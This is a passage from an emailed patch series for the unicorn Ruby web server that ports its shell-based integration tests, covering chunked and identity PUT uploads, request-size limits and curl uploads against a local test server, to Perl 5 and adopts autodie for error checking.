+		my $dig = Digest::MD5->new;
+		print $out <<EOM;
+PUT $path HTTP/1.1\r
+Transfer-Encoding: chunked\r
+Trailer: Content-MD5\r
+\r
+EOM
+		my ($buf, $r);
+		while (1) {
+			$r = read($in, $buf, $bs) // die "read: $!";
+			last if $r == 0;
+			printf $out "%x\r\n", length($buf);
+			print $out $buf, "\r\n";
+			$dig->add($buf);
+		}
+		print $out "0\r\nContent-MD5: ", $dig->b64digest, "\r\n\r\n";
+	},
+	identity => sub {
+		my ($in, $out, $path, %opt) = @_;
+		my $bs = $opt{bs} // 16384;
+		my $clen = $opt{-s} // -s $in;
+		print $out <<EOM;
+PUT $path HTTP/1.0\r
+Content-Length: $clen\r
+\r
+EOM
+		my ($buf, $r, $len);
+		while ($clen) {
+			$len = $clen > $bs ? $bs : $clen;
+			$r = read($in, $buf, $len) // die "read: $!";
+			die 'premature EOF' if $r == 0;
+			print $out $buf;
+			$clen -= $r;
+		}
+	},
+);
+
 my ($c, $status, $hdr);
 
 # response header tests
@@ -111,6 +156,55 @@ if ('bad requests') {
 	like($status, qr!\AHTTP/1\.[01] 414 \b!, '414 on FRAGMENT > (1024)');
 }
 
+# input tests
+my ($blob_size, $blob_hash);
+SKIP: {
+	open(my $rh, '<', 't/random_blob') or
+		skip "t/random_blob not generated $!", 1;
+	$blob_size = -s $rh;
+	require Digest::SHA;
+	$blob_hash = Digest::SHA->new(1)->addfile($rh)->hexdigest;
+
+	my $ck_hash = sub {
+		my ($sub, $path, %opt) = @_;
+		seek($rh, 0, SEEK_SET) // die "seek: $!";
+		$c = tcp_connect($srv);
+		$c->autoflush(0);
+		$PUT{$sub}->($rh, $c, $path, %opt);
+		$c->flush or die "flush: $!";
+		($status, $hdr) = slurp_hdr($c);
+		is(readline($c), $blob_hash, "$sub $path");
+	};
+	$ck_hash->('identity', '/rack_input', -s => $blob_size);
+	$ck_hash->('chunked_md5', '/rack_input');
+	$ck_hash->('identity', '/rack_input/size_first', -s => $blob_size);
+	$ck_hash->('identity', '/rack_input/rewind_first', -s => $blob_size);
+	$ck_hash->('chunked_md5', '/rack_input/size_first');
+	$ck_hash->('chunked_md5', '/rack_input/rewind_first');
+
+
+	$curl // skip 'no curl found in PATH', 1;
+
+	my ($copt, $cout);
+	my $url = "http://$host_port/rack_input";
+	my $do_curl = sub {
+		my (@arg) = @_;
+		pipe(my $cout, $copt->{1}) or die "pipe: $!";
+		open $copt->{2}, '>', "$tmpdir/curl.err" or die $!;
+		my $cpid = spawn($curl, '-sSf', @arg, $url, $copt);
+		close(delete $copt->{1}) or die "close: $!";
+		is(readline($cout), $blob_hash, "curl @arg response");
+		is(waitpid($cpid, 0), $cpid, "curl @arg exited");
+		is($?, 0, "no error from curl @arg");
+		is(slurp("$tmpdir/curl.err"), '', "no stderr from curl @arg");
+	};
+
+	$do_curl->(qw(-T t/random_blob));
+
+	seek($rh, 0, SEEK_SET) // die "seek: $!";
+	$copt->{0} = $rh;
+	$do_curl->('-T-');
+}
 
 # ... more stuff here
 undef $ar;
@@ -120,4 +214,5 @@ my @err = grep(!/NameError.*Unicorn::Waiter/, grep(/error/i, @log));
 is_deeply(\@err, [], 'no unexpected errors in stderr');
 is_deeply([grep(/SIGKILL/, @log)], [], 'no SIGKILL in stderr');
 
+undef $tmpdir;
 done_testing;
diff --git a/t/lib.perl b/t/lib.perl
index 7d712b5..ae9f197 100644
--- a/t/lib.perl
+++ b/t/lib.perl
@@ -10,7 +10,7 @@ use POSIX qw(dup2 _exit setpgid :signal_h SEEK_SET F_SETFD);
 use File::Temp 0.19 (); # 0.19 for ->newdir
 our ($tmpdir, $errfh);
 our @EXPORT = qw(unicorn slurp tcp_server tcp_connect unicorn $tmpdir $errfh
-	SEEK_SET tcp_host_port start_req);
+	SEEK_SET tcp_host_port start_req which spawn);
 
 my ($base) = ($0 =~ m!\b([^/]+)\.[^\.]+\z!);
 $tmpdir = File::Temp->newdir("unicorn-$base-XXXX", TMPDIR => 1);
@@ -193,4 +193,5 @@ Test::More->import;
 # try to ensure ->DESTROY fires:
 $SIG{TERM} = sub { exit(15 + 128) };
 $SIG{INT} = sub { exit(2 + 128) };
+$SIG{PIPE} = sub { exit(13 + 128) };
 1;
diff --git a/t/rack-input-tests.ru b/t/rack-input-tests.ru
deleted file mode 100644
index 5459e85..0000000
--- a/t/rack-input-tests.ru
+++ /dev/null
@@ -1,21 +0,0 @@
-# SHA1 checksum generator
-require 'digest/sha1'
-use Rack::ContentLength
-cap = 16384
-app = lambda do |env|
-  /\A100-continue\z/i =~ env['HTTP_EXPECT'] and
-    return [ 100, {}, [] ]
-  digest = Digest::SHA1.new
-  input = env['rack.input']
-  input.size if env["PATH_INFO"] == "/size_first"
-  input.rewind if env["PATH_INFO"] == "/rewind_first"
-  if buf = input.read(rand(cap))
-    begin
-      raise "#{buf.size} > #{cap}" if buf.size > cap
-      digest.update(buf)
-    end while input.read(rand(cap), buf)
-  end
-
-  [ 200, {'content-type' => 'text/plain'}, [ digest.hexdigest << "\n" ] ]
-end
-run app
diff --git a/t/t0100-rack-input-tests.sh b/t/t0100-rack-input-tests.sh
deleted file mode 100755
index ee7a437..0000000
--- a/t/t0100-rack-input-tests.sh
+++ /dev/null
@@ -1,124 +0,0 @@
-#!/bin/sh
-. ./test-lib.sh
-test -r random_blob || die "random_blob required, run with 'make $0'"
-
-t_plan 10 "rack.input read tests"
-
-t_begin "setup and startup" && {
-	rtmpfiles curl_out curl_err
-	unicorn_setup
-	unicorn -E none -D rack-input-tests.ru -c $unicorn_config
-	blob_sha1=$(rsha1 < random_blob)
-	blob_size=$(count_bytes < random_blob)
-	t_info "blob_sha1=$blob_sha1"
-	unicorn_wait_start
-}
-
-t_begin "corked identity request" && {
-	rm -f $tmp
-	(
-		cat $fifo > $tmp &
-		printf 'PUT / HTTP/1.0\r\n'
-		printf 'Content-Length: %d\r\n\r\n' $blob_size
-		cat random_blob
-		wait
-		echo ok > $ok
-	) | ( sleep 1 && socat - TCP4:$listen > $fifo )
-	test 1 -eq $(grep $blob_sha1 $tmp |count_lines)
-	test x"$(cat $ok)" = xok
-}
-
-t_begin "corked chunked request" && {
-	rm -f $tmp
-	(
-		cat $fifo > $tmp &
-		content-md5-put < random_blob
-		wait
-		echo ok > $ok
-	) | ( sleep 1 && socat - TCP4:$listen > $fifo )
-	test 1 -eq $(grep $blob_sha1 $tmp |count_lines)
-	test x"$(cat $ok)" = xok
-}
-
-t_begin "corked identity request (input#size first)" && {
-	rm -f $tmp
-	(
-		cat $fifo > $tmp &
-		printf 'PUT /size_first HTTP/1.0\r\n'
-		printf 'Content-Length: %d\r\n\r\n' $blob_size
-		cat random_blob
-		wait
-		echo ok > $ok
-	) | ( sleep 1 && socat - TCP4:$listen > $fifo )
-	test 1 -eq $(grep $blob_sha1 $tmp |count_lines)
-	test x"$(cat $ok)" = xok
-}
-
-t_begin "corked identity request (input#rewind first)" && {
-	rm -f $tmp
-	(
-		cat $fifo > $tmp &
-		printf 'PUT /rewind_first HTTP/1.0\r\n'
-		printf 'Content-Length: %d\r\n\r\n' $blob_size
-		cat random_blob
-		wait
-		echo ok > $ok
-	) | ( sleep 1 && socat - TCP4:$listen > $fifo )
-	test 1 -eq $(grep $blob_sha1 $tmp |count_lines)
-	test x"$(cat $ok)" = xok
-}
-
-t_begin "corked chunked request (input#size first)" && {
-	rm -f $tmp
-	(
-		cat $fifo > $tmp &
-		printf 'PUT /size_first HTTP/1.1\r\n'
-		printf 'Host: example.com\r\n'
-		printf 'Transfer-Encoding: chunked\r\n'
-		printf 'Trailer: Content-MD5\r\n'
-		printf '\r\n'
-		content-md5-put --no-headers < random_blob
-		wait
-		echo ok > $ok
-	) | ( sleep 1 && socat - TCP4:$listen > $fifo )
-	test 1 -eq $(grep $blob_sha1 $tmp |count_lines)
-	test 1 -eq $(grep $blob_sha1 $tmp |count_lines)
-	test x"$(cat $ok)" = xok
-}
-
-t_begin "corked chunked request (input#rewind first)" && {
-	rm -f $tmp
-	(
-		cat $fifo > $tmp &
-		printf 'PUT /rewind_first HTTP/1.1\r\n'
-		printf 'Host: example.com\r\n'
-		printf 'Transfer-Encoding: chunked\r\n'
-		printf 'Trailer: Content-MD5\r\n'
-		printf '\r\n'
-		content-md5-put --no-headers < random_blob
-		wait
-		echo ok > $ok
-	) | ( sleep 1 && socat - TCP4:$listen > $fifo )
-	test 1 -eq $(grep $blob_sha1 $tmp |count_lines)
-	test x"$(cat $ok)" = xok
-}
-
-t_begin "regular request" && {
-	curl -sSf -T random_blob http://$listen/ > $curl_out 2> $curl_err
-        test x$blob_sha1 = x$(cat $curl_out)
-        test ! -s $curl_err
-}
-
-t_begin "chunked request" && {
-	curl -sSf -T- < random_blob http://$listen/ > $curl_out 2> $curl_err
-        test x$blob_sha1 = x$(cat $curl_out)
-        test ! -s $curl_err
-}
-
-dbgcat r_err
-
-t_begin "shutdown" && {
-	kill $unicorn_pid
-}
-
-t_done

[-- Attachment #10: 0009-tests-use-autodie-to-simplify-error-checking.patch --]
[-- Type: text/x-diff, Size: 8495 bytes --]

From 3a1d015a3859b639d8e4463e9436a49f4f0f720e Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:38 +0000
Subject: [PATCH 09/23] tests: use autodie to simplify error checking

autodie is bundled with Perl 5.10+ and simplifies error
checking in most cases.  Some subroutines aren't perfectly
translatable and their call sites had to be tweaked, but
most of them are.
---
 t/active-unix-socket.t | 13 +++++++------
 t/integration.t        | 37 +++++++++++++++++++------------------
 t/lib.perl             | 30 +++++++++++++++---------------
 3 files changed, 41 insertions(+), 39 deletions(-)

diff --git a/t/active-unix-socket.t b/t/active-unix-socket.t
index 6b5c218..1241904 100644
--- a/t/active-unix-socket.t
+++ b/t/active-unix-socket.t
@@ -4,17 +4,18 @@
 
 use v5.14; BEGIN { require './t/lib.perl' };
 use IO::Socket::UNIX;
+use autodie;
+no autodie 'kill';
 my %to_kill;
 END { kill('TERM', values(%to_kill)) if keys %to_kill }
 my $u1 = "$tmpdir/u1.sock";
 my $u2 = "$tmpdir/u2.sock";
 my $unix_req = sub {
 	my $s = IO::Socket::UNIX->new(Peer => shift, Type => SOCK_STREAM);
-	print $s @_, "\r\n\r\n" or die $!;
+	print $s @_, "\r\n\r\n";
 	$s;
 };
 {
-	use autodie;
 	open my $fh, '>', "$tmpdir/u1.conf.rb";
 	print $fh <<EOM;
 pid "$tmpdir/u.pid"
@@ -43,8 +44,8 @@ EOM
 my @uarg = qw(-D -E none t/integration.ru);
 
 # this pipe will be used to notify us when all daemons die:
-pipe(my ($p0, $p1)) or die "pipe: $!";
-fcntl($p1, POSIX::F_SETFD, 0) or die "fcntl: $!"; # clear FD_CLOEXEC
+pipe(my $p0, my $p1);
+fcntl($p1, POSIX::F_SETFD, 0);
 
 # start the first instance
 unicorn('-c', "$tmpdir/u1.conf.rb", @uarg)->join;
@@ -93,8 +94,8 @@ is($pidf, $to_kill{u1}, 'pid file contents unchanged after 2nd start failure');
 
 # restart the first instance
 {
-	pipe(($p0, $p1)) or die "pipe: $!";
-	fcntl($p1, POSIX::F_SETFD, 0) or die "fcntl: $!"; # clear FD_CLOEXEC
+	pipe($p0, $p1);
+	fcntl($p1, POSIX::F_SETFD, 0);
 	unicorn('-c', "$tmpdir/u1.conf.rb", @uarg)->join;
 	is($?, 0, 'daemonized 1st process');
 	chomp($to_kill{u1} = slurp("$tmpdir/u.pid"));
diff --git a/t/integration.t b/t/integration.t
index 8cef561..af17d51 100644
--- a/t/integration.t
+++ b/t/integration.t
@@ -5,6 +5,7 @@
 # restarting or signals
 
 use v5.14; BEGIN { require './t/lib.perl' };
+use autodie;
 my $srv = tcp_server();
 my $host_port = tcp_host_port($srv);
 my $t0 = time;
@@ -34,7 +35,7 @@ Trailer: Content-MD5\r
 EOM
 		my ($buf, $r);
 		while (1) {
-			$r = read($in, $buf, $bs) // die "read: $!";
+			$r = read($in, $buf, $bs);
 			last if $r == 0;
 			printf $out "%x\r\n", length($buf);
 			print $out $buf, "\r\n";
@@ -54,7 +55,7 @@ EOM
 		my ($buf, $r, $len);
 		while ($clen) {
 			$len = $clen > $bs ? $bs : $clen;
-			$r = read($in, $buf, $len) // die "read: $!";
+			$r = read($in, $buf, $len);
 			die 'premature EOF' if $r == 0;
 			print $out $buf;
 			$clen -= $r;
@@ -130,28 +131,28 @@ if ('bad requests') {
 	like($status, qr!\AHTTP/1\.[01] 400 \b!, 'got 400 on bad request');
 
 	$c = tcp_connect($srv);
-	print $c 'GET /' or die $!;
+	print $c 'GET /';
 	my $buf = join('', (0..9), 'ab');
-	for (0..1023) { print $c $buf or die $! }
-	print $c " HTTP/1.0\r\n\r\n" or die $!;
+	for (0..1023) { print $c $buf }
+	print $c " HTTP/1.0\r\n\r\n";
 	($status, $hdr) = slurp_hdr($c);
 	like($status, qr!\AHTTP/1\.[01] 414 \b!,
 		'414 on REQUEST_PATH > (12 * 1024)');
 
 	$c = tcp_connect($srv);
-	print $c 'GET /hello-world?a' or die $!;
+	print $c 'GET /hello-world?a';
 	$buf = join('', (0..9));
-	for (0..1023) { print $c $buf or die $! }
-	print $c " HTTP/1.0\r\n\r\n" or die $!;
+	for (0..1023) { print $c $buf }
+	print $c " HTTP/1.0\r\n\r\n";
 	($status, $hdr) = slurp_hdr($c);
 	like($status, qr!\AHTTP/1\.[01] 414 \b!,
 		'414 on QUERY_STRING > (10 * 1024)');
 
 	$c = tcp_connect($srv);
-	print $c 'GET /hello-world#a' or die $!;
+	print $c 'GET /hello-world#a';
 	$buf = join('', (0..9), 'a'..'f');
-	for (0..63) { print $c $buf or die $! }
-	print $c " HTTP/1.0\r\n\r\n" or die $!;
+	for (0..63) { print $c $buf }
+	print $c " HTTP/1.0\r\n\r\n";
 	($status, $hdr) = slurp_hdr($c);
 	like($status, qr!\AHTTP/1\.[01] 414 \b!, '414 on FRAGMENT > (1024)');
 }
@@ -159,7 +160,7 @@ if ('bad requests') {
 # input tests
 my ($blob_size, $blob_hash);
 SKIP: {
-	open(my $rh, '<', 't/random_blob') or
+	CORE::open(my $rh, '<', 't/random_blob') or
 		skip "t/random_blob not generated $!", 1;
 	$blob_size = -s $rh;
 	require Digest::SHA;
@@ -167,11 +168,11 @@ SKIP: {
 
 	my $ck_hash = sub {
 		my ($sub, $path, %opt) = @_;
-		seek($rh, 0, SEEK_SET) // die "seek: $!";
+		seek($rh, 0, SEEK_SET);
 		$c = tcp_connect($srv);
 		$c->autoflush(0);
 		$PUT{$sub}->($rh, $c, $path, %opt);
-		$c->flush or die "flush: $!";
+		$c->flush or die $!;
 		($status, $hdr) = slurp_hdr($c);
 		is(readline($c), $blob_hash, "$sub $path");
 	};
@@ -189,10 +190,10 @@ SKIP: {
 	my $url = "http://$host_port/rack_input";
 	my $do_curl = sub {
 		my (@arg) = @_;
-		pipe(my $cout, $copt->{1}) or die "pipe: $!";
-		open $copt->{2}, '>', "$tmpdir/curl.err" or die $!;
+		pipe(my $cout, $copt->{1});
+		open $copt->{2}, '>', "$tmpdir/curl.err";
 		my $cpid = spawn($curl, '-sSf', @arg, $url, $copt);
-		close(delete $copt->{1}) or die "close: $!";
+		close(delete $copt->{1});
 		is(readline($cout), $blob_hash, "curl @arg response");
 		is(waitpid($cpid, 0), $cpid, "curl @arg exited");
 		is($?, 0, "no error from curl @arg");
@@ -201,7 +202,7 @@ SKIP: {
 
 	$do_curl->(qw(-T t/random_blob));
 
-	seek($rh, 0, SEEK_SET) // die "seek: $!";
+	seek($rh, 0, SEEK_SET);
 	$copt->{0} = $rh;
 	$do_curl->('-T-');
 }
diff --git a/t/lib.perl b/t/lib.perl
index ae9f197..49632cf 100644
--- a/t/lib.perl
+++ b/t/lib.perl
@@ -4,6 +4,7 @@
 package UnicornTest;
 use v5.14;
 use parent qw(Exporter);
+use autodie;
 use Test::More;
 use IO::Socket::INET;
 use POSIX qw(dup2 _exit setpgid :signal_h SEEK_SET F_SETFD);
@@ -14,7 +15,7 @@ our @EXPORT = qw(unicorn slurp tcp_server tcp_connect unicorn $tmpdir $errfh
 
 my ($base) = ($0 =~ m!\b([^/]+)\.[^\.]+\z!);
 $tmpdir = File::Temp->newdir("unicorn-$base-XXXX", TMPDIR => 1);
-open($errfh, '>>', "$tmpdir/err.log") or die "open: $!";
+open($errfh, '>>', "$tmpdir/err.log");
 
 sub tcp_server {
 	my %opt = (
@@ -62,14 +63,14 @@ sub tcp_connect {
 sub start_req {
 	my ($srv, @req) = @_;
 	my $c = tcp_connect($srv);
-	print $c @req, "\r\n\r\n" or die "print: $!";
+	print $c @req, "\r\n\r\n";
 	$c;
 }
 
 sub slurp {
-	open my $fh, '<', $_[0] or die "open($_[0]): $!";
+	open my $fh, '<', $_[0];
 	local $/;
-	<$fh>;
+	readline($fh);
 }
 
 sub spawn {
@@ -80,8 +81,8 @@ sub spawn {
 	my $set = POSIX::SigSet->new;
 	$set->fillset or die "sigfillset: $!";
 	sigprocmask(SIG_SETMASK, $set, $old) or die "SIG_SETMASK: $!";
-	pipe(my ($r, $w)) or die "pipe: $!";
-	my $pid = fork // die "fork: $!";
+	pipe(my $r, my $w);
+	my $pid = fork;
 	if ($pid == 0) {
 		close $r;
 		$SIG{__DIE__} = sub {
@@ -94,9 +95,9 @@ sub spawn {
 		my $cfd;
 		for ($cfd = 0; ($cfd < 3) || defined($opt->{$cfd}); $cfd++) {
 			my $io = $opt->{$cfd} // next;
-			my $pfd = fileno($io) // die "fileno($io): $!";
+			my $pfd = fileno($io);
 			if ($pfd == $cfd) {
-				fcntl($io, F_SETFD, 0) // die "F_SETFD: $!";
+				fcntl($io, F_SETFD, 0);
 			} else {
 				dup2($pfd, $cfd) // die "dup2($pfd, $cfd): $!";
 			}
@@ -110,9 +111,7 @@ sub spawn {
 			setpgid(0, $pgid) // die "setpgid(0, $pgid): $!";
 		}
 		$SIG{$_} = 'DEFAULT' for grep(!/^__/, keys %SIG);
-		if (defined(my $cd = $opt->{-C})) {
-			chdir $cd // die "chdir($cd): $!";
-		}
+		if (defined(my $cd = $opt->{-C})) { chdir $cd }
 		$old->delset(POSIX::SIGCHLD) or die "sigdelset CHLD: $!";
 		sigprocmask(SIG_SETMASK, $old) or die "SIG_SETMASK: ~CHLD: $!";
 		@ENV{keys %$env} = values(%$env) if $env;
@@ -162,22 +161,23 @@ sub unicorn {
 # automatically kill + reap children when this goes out-of-scope
 package UnicornTest::AutoReap;
 use v5.14;
+use autodie;
 
 sub new {
 	my (undef, $pid) = @_;
 	bless { pid => $pid, owner => $$ }, __PACKAGE__
 }
 
-sub kill {
+sub do_kill {
 	my ($self, $sig) = @_;
-	CORE::kill($sig // 'TERM', $self->{pid});
+	kill($sig // 'TERM', $self->{pid});
 }
 
 sub join {
 	my ($self, $sig) = @_;
 	my $pid = delete $self->{pid} or return;
-	CORE::kill($sig, $pid) if defined $sig;
-	my $ret = waitpid($pid, 0) // die "waitpid($pid): $!";
+	kill($sig, $pid) if defined $sig;
+	my $ret = waitpid($pid, 0);
 	$ret == $pid or die "BUG: waitpid($pid) != $ret";
 }
 

[-- Attachment #11: 0010-port-t0019-max_header_len.sh-to-Perl-5.patch --]
[-- Type: text/x-diff, Size: 5571 bytes --]

From 43c7d73b8b9e6995b5a986b10a8623395e89a538 Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:39 +0000
Subject: [PATCH 10/23] port t0019-max_header_len.sh to Perl 5

This was the final socat requirement for integration tests.
I think curl will remain an optional dependency for tests
since it's probably the most widely-installed HTTP client.
---
 GNUmakefile               |  2 +-
 t/README                  |  7 +-----
 t/integration.ru          |  1 +
 t/integration.t           | 43 +++++++++++++++++++++++++++++++---
 t/t0019-max_header_len.sh | 49 ---------------------------------------
 5 files changed, 43 insertions(+), 59 deletions(-)
 delete mode 100755 t/t0019-max_header_len.sh

diff --git a/GNUmakefile b/GNUmakefile
index 5cca189..eab9082 100644
--- a/GNUmakefile
+++ b/GNUmakefile
@@ -125,7 +125,7 @@ $(T_sh): dep $(test_prereq) t/random_blob t/trash/.gitignore
 t/trash/.gitignore : | t/trash
 	echo '*' >$@
 
-dependencies := socat curl
+dependencies := curl
 deps := $(addprefix t/.dep+,$(dependencies))
 $(deps): dep_bin = $(lastword $(subst +, ,$@))
 $(deps):
diff --git a/t/README b/t/README
index 8a5243e..d09c715 100644
--- a/t/README
+++ b/t/README
@@ -10,18 +10,13 @@ to test real-world behavior and Ruby introduces incompatibilities
 at a far faster rate than Perl 5.  Perl is Ruby's older cousin, so
 it should be easy-to-learn for Rubyists.
 
-Old tests are in Bourne shell, but the socat(1) dependency was probably
-too rare compared to Perl 5.
+Old tests are in Bourne shell and slowly being ported to Perl 5.
 
 == Requirements
 
 * {Ruby 2.0.0+}[https://www.ruby-lang.org/en/]
 * {Perl 5.14+}[https://www.perl.org/] # your distro should have it
 * {GNU make}[https://www.gnu.org/software/make/]
-
-The following requirements will eventually be dropped.
-
-* {socat}[http://www.dest-unreach.org/socat/]
 * {curl}[https://curl.haxx.se/]
 
 We do not use bashisms or any non-portable, non-POSIX constructs
diff --git a/t/integration.ru b/t/integration.ru
index 98528f6..edc408c 100644
--- a/t/integration.ru
+++ b/t/integration.ru
@@ -81,6 +81,7 @@ def rack_input_tests(env)
     when '/env_dump'; [ 200, {}, [ env_dump(env) ] ]
     when '/write_on_close'; write_on_close
     when '/pid'; [ 200, {}, [ "#$$\n" ] ]
+    else '/'; [ 200, {}, [ env_dump(env) ] ]
     end # case PATH_INFO (GET)
   when 'POST'
     case env['PATH_INFO']
diff --git a/t/integration.t b/t/integration.t
index af17d51..c687655 100644
--- a/t/integration.t
+++ b/t/integration.t
@@ -1,15 +1,19 @@
 #!perl -w
 # Copyright (C) unicorn hackers <unicorn-public@yhbt.net>
 # License: GPL-3.0+ <https://www.gnu.org/licenses/gpl-3.0.txt>
-# this is the main integration test for things which don't require
-# restarting or signals
+
+# This is the main integration test for fast-ish things to minimize
+# Ruby startup time penalties.
 
 use v5.14; BEGIN { require './t/lib.perl' };
 use autodie;
 my $srv = tcp_server();
 my $host_port = tcp_host_port($srv);
 my $t0 = time;
-my $ar = unicorn(qw(-E none t/integration.ru), { 3 => $srv });
+my $conf = "$tmpdir/u.conf.rb";
+open my $conf_fh, '>', $conf;
+$conf_fh->autoflush(1);
+my $ar = unicorn(qw(-E none t/integration.ru -c), $conf, { 3 => $srv });
 my $curl = which('curl');
 END { diag slurp("$tmpdir/err.log") if $tmpdir };
 sub slurp_hdr {
@@ -207,7 +211,40 @@ SKIP: {
 	$do_curl->('-T-');
 }
 
+
 # ... more stuff here
+
+# SIGHUP-able stuff goes here
+
+if ('max_header_len internal API') {
+	undef $c;
+	my $req = 'GET / HTTP/1.0';
+	my $len = length($req."\r\n\r\n");
+	my $fifo = "$tmpdir/fifo";
+	POSIX::mkfifo($fifo, 0600) or die "mkfifo: $!";
+	print $conf_fh <<EOM;
+Unicorn::HttpParser.max_header_len = $len
+listen "$host_port" # TODO: remove this requirement for SIGHUP
+after_fork { |_,_| File.open('$fifo', 'w') { |fp| fp.write "pid=#\$\$" } }
+EOM
+	$ar->do_kill('HUP');
+	open my $fifo_fh, '<', $fifo;
+	my $wpid = readline($fifo_fh);
+	like($wpid, qr/\Apid=\d+\z/a , 'new worker ready');
+	close $fifo_fh;
+	$wpid =~ s/\Apid=// or die;
+	ok(CORE::kill(0, $wpid), 'worker PID retrieved');
+
+	$c = start_req($srv, $req);
+	($status, $hdr) = slurp_hdr($c);
+	like($status, qr!\AHTTP/1\.[01] 200\b!, 'minimal request succeeds');
+
+	$c = start_req($srv, 'GET /xxxxxx HTTP/1.0');
+	($status, $hdr) = slurp_hdr($c);
+	like($status, qr!\AHTTP/1\.[01] 413\b!, 'big request fails');
+}
+
+
 undef $ar;
 my @log = slurp("$tmpdir/err.log");
 diag("@log") if $ENV{V};
diff --git a/t/t0019-max_header_len.sh b/t/t0019-max_header_len.sh
deleted file mode 100755
index 6a355b4..0000000
--- a/t/t0019-max_header_len.sh
+++ /dev/null
@@ -1,49 +0,0 @@
-#!/bin/sh
-. ./test-lib.sh
-t_plan 5 "max_header_len setting (only intended for Rainbows!)"
-
-t_begin "setup and start" && {
-	unicorn_setup
-	req='GET / HTTP/1.0\r\n\r\n'
-	len=$(printf "$req" | count_bytes)
-	echo Unicorn::HttpParser.max_header_len = $len >> $unicorn_config
-	unicorn -D -c $unicorn_config env.ru
-	unicorn_wait_start
-}
-
-t_begin "minimal request succeeds" && {
-	rm -f $tmp
-	(
-		cat $fifo > $tmp &
-		printf "$req"
-		wait
-		echo ok > $ok
-	) | socat - TCP:$listen > $fifo
-	test xok = x$(cat $ok)
-
-	fgrep "HTTP/1.1 200 OK" $tmp
-}
-
-t_begin "big request fails" && {
-	rm -f $tmp
-	(
-		cat $fifo > $tmp &
-		printf 'GET /xxxxxx HTTP/1.0\r\n\r\n'
-		wait
-		echo ok > $ok
-	) | socat - TCP:$listen > $fifo
-	test xok = x$(cat $ok)
-	fgrep "HTTP/1.1 413" $tmp
-}
-
-dbgcat tmp
-
-t_begin "killing succeeds" && {
-	kill $unicorn_pid
-}
-
-t_begin "check stderr" && {
-	check_stderr
-}
-
-t_done

[-- Attachment #12: 0011-test_exec-drop-sd_listen_fds-emulation-test.patch --]
[-- Type: text/x-diff, Size: 1751 bytes --]

From 5d828a4ef7683345bcf2ff659442fed0a6fb7a97 Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:40 +0000
Subject: [PATCH 11/23] test_exec: drop sd_listen_fds emulation test

The Perl 5 tests already rely on this implicitly, and there was
never a point when Perl 5 couldn't emulate systemd behavior.
---
 test/exec/test_exec.rb | 33 ---------------------------------
 1 file changed, 33 deletions(-)

diff --git a/test/exec/test_exec.rb b/test/exec/test_exec.rb
index 2929b2e..1d3a0fd 100644
--- a/test/exec/test_exec.rb
+++ b/test/exec/test_exec.rb
@@ -97,39 +97,6 @@ def teardown
     end
   end
 
-  def test_sd_listen_fds_emulation
-    # [ruby-core:69895] [Bug #11336] fixed by r51576
-    return if RUBY_VERSION.to_f < 2.3
-
-    File.open("config.ru", "wb") { |fp| fp.write(HI) }
-    sock = TCPServer.new(@addr, @port)
-
-    [ %W(-l #@addr:#@port), nil ].each do |l|
-      sock.setsockopt(:SOL_SOCKET, :SO_KEEPALIVE, 0)
-
-      pid = xfork do
-        redirect_test_io do
-          # pretend to be systemd
-          ENV['LISTEN_PID'] = "#$$"
-          ENV['LISTEN_FDS'] = '1'
-
-          # 3 = SD_LISTEN_FDS_START
-          args = [ $unicorn_bin ]
-          args.concat(l) if l
-          args << { 3 => sock }
-          exec(*args)
-        end
-      end
-      res = hit(["http://#@addr:#@port/"])
-      assert_equal [ "HI\n" ], res
-      assert_shutdown(pid)
-      assert sock.getsockopt(:SOL_SOCKET, :SO_KEEPALIVE).bool,
-                  'unicorn should always set SO_KEEPALIVE on inherited sockets'
-    end
-  ensure
-    sock.close if sock
-  end
-
   def test_inherit_listener_unspecified
     File.open("config.ru", "wb") { |fp| fp.write(HI) }
     sock = TCPServer.new(@addr, @port)

[-- Attachment #13: 0012-test_exec-drop-test_basic-and-test_config_ru_alt_pat.patch --]
[-- Type: text/x-diff, Size: 1667 bytes --]

From 548593c6b3d52a4bebd52542ad9c423ed2b7252d Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:41 +0000
Subject: [PATCH 12/23] test_exec: drop test_basic and test_config_ru_alt_path

We already have coverage for these basic things elsewhere.
---
 test/exec/test_exec.rb | 24 ------------------------
 1 file changed, 24 deletions(-)

diff --git a/test/exec/test_exec.rb b/test/exec/test_exec.rb
index 1d3a0fd..55f828e 100644
--- a/test/exec/test_exec.rb
+++ b/test/exec/test_exec.rb
@@ -265,16 +265,6 @@ def test_exit_signals
     end
   end
 
-  def test_basic
-    File.open("config.ru", "wb") { |fp| fp.syswrite(HI) }
-    pid = fork do
-      redirect_test_io { exec($unicorn_bin, "-l", "#{@addr}:#{@port}") }
-    end
-    results = retry_hit(["http://#{@addr}:#{@port}/"])
-    assert_equal String, results[0].class
-    assert_shutdown(pid)
-  end
-
   def test_rack_env_unset
     File.open("config.ru", "wb") { |fp| fp.syswrite(SHOW_RACK_ENV) }
     pid = fork { redirect_test_io { exec($unicorn_bin, "-l#@addr:#@port") } }
@@ -638,20 +628,6 @@ def test_read_embedded_cli_switches
     assert_shutdown(pid)
   end
 
-  def test_config_ru_alt_path
-    config_path = "#{@tmpdir}/foo.ru"
-    File.open(config_path, "wb") { |fp| fp.syswrite(HI) }
-    pid = fork do
-      redirect_test_io do
-        Dir.chdir("/")
-        exec($unicorn_bin, "-l#{@addr}:#{@port}", config_path)
-      end
-    end
-    results = retry_hit(["http://#{@addr}:#{@port}/"])
-    assert_equal String, results[0].class
-    assert_shutdown(pid)
-  end
-
   def test_load_module
     libdir = "#{@tmpdir}/lib"
     FileUtils.mkpath([ libdir ])

[-- Attachment #14: 0013-tests-check_stderr-consistently-in-Perl-5-tests.patch --]
[-- Type: text/x-diff, Size: 2415 bytes --]

From cd7ee67fc8ebadec9bdd913d49ed3f214596ea47 Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:42 +0000
Subject: [PATCH 13/23] tests: check_stderr consistently in Perl 5 tests

The Bourne shell tests did, so lets not let stuff sneak past us.
---
 t/active-unix-socket.t |  5 ++---
 t/integration.t        |  7 ++-----
 t/lib.perl             | 10 +++++++++-
